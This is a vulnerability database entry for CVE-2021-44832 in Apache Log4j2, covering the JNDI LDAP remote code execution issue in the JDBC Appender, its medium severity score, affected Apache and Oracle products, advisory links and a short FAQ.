Vulnerability Description
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
CVSS Score
MEDIUM
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Apache | Log4J | >= 2.0.1, < 2.3.2 |
| Oracle | Communications Diameter Signaling Router | >= 8.0.0.0, <= 8.5.1.0 |
| Oracle | Communications Interactive Session Recorder | 6.3 |
| Oracle | Primavera Gateway | >= 17.12.0, <= 17.12.11 |
| Oracle | Primavera P6 Enterprise Project Portfolio Management | >= 19.12.0, <= 19.12.18.0 |
| Oracle | Primavera Unifier | 18.8 |
| Oracle | Retail Assortment Planning | 16.0.3 |
| Oracle | Retail Fiscal Management | 14.2 |
| Oracle | Siebel Ui Framework | 21.12 |
| Oracle | Weblogic Server | 12.2.1.3.0 |
| Cisco | Cloudcenter | 4.10.0.16 |
| Fedoraproject | Fedora | 34 |
| Debian | Debian Linux | 9.0 |
| Oracle | Communications Brm - Elastic Charging Engine | < 12.0.0.4.6 |
| Oracle | Communications Offline Mediation Controller | < 12.0.0.4.4 |
| Oracle | Flexcube Private Banking | 12.1.0 |
| Oracle | Health Sciences Data Management Workbench | 2.5.2.1 |
| Oracle | Policy Automation | >= 12.2.0, <= 12.2.24 |
| Oracle | Policy Automation For Mobile Devices | >= 12.2.0, <= 12.2.24 |
| Oracle | Product Lifecycle Analytics | 3.6.1 |
Related Weaknesses (CWE)
References
- http://www.openwall.com/lists/oss-security/2021/12/28/1Mailing ListThird Party Advisory
- https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdfThird Party Advisory
- https://issues.apache.org/jira/browse/LOG4J2-3293Issue TrackingPatchVendor Advisory
- https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143Mailing ListVendor Advisory
- https://lists.debian.org/debian-lts-announce/2021/12/msg00036.htmlMailing ListThird Party Advisory
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedorapro
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedorapro
- https://security.netapp.com/advisory/ntap-20220104-0001/Third Party Advisory
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aThird Party Advisory
- https://www.oracle.com/security-alerts/cpuapr2022.htmlPatchThird Party Advisory
- https://www.oracle.com/security-alerts/cpujan2022.htmlPatchThird Party Advisory
- https://www.oracle.com/security-alerts/cpujul2022.htmlPatchThird Party Advisory
- http://www.openwall.com/lists/oss-security/2021/12/28/1Mailing ListThird Party Advisory
- https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdfThird Party Advisory
- https://issues.apache.org/jira/browse/LOG4J2-3293Issue TrackingPatchVendor Advisory
FAQ
What is CVE-2021-44832?
CVE-2021-44832 is a vulnerability with a CVSS score of 6.6 (MEDIUM). Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with...
How severe is CVE-2021-44832?
CVE-2021-44832 has been rated MEDIUM with a CVSS base score of 6.6/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2021-44832?
Check the references section above for vendor advisories and patch information. Affected products include: Apache Log4J, Oracle Communications Diameter Signaling Router, Oracle Communications Interactive Session Recorder, Oracle Primavera Gateway, Oracle Primavera P6 Enterprise Project Portfolio Management.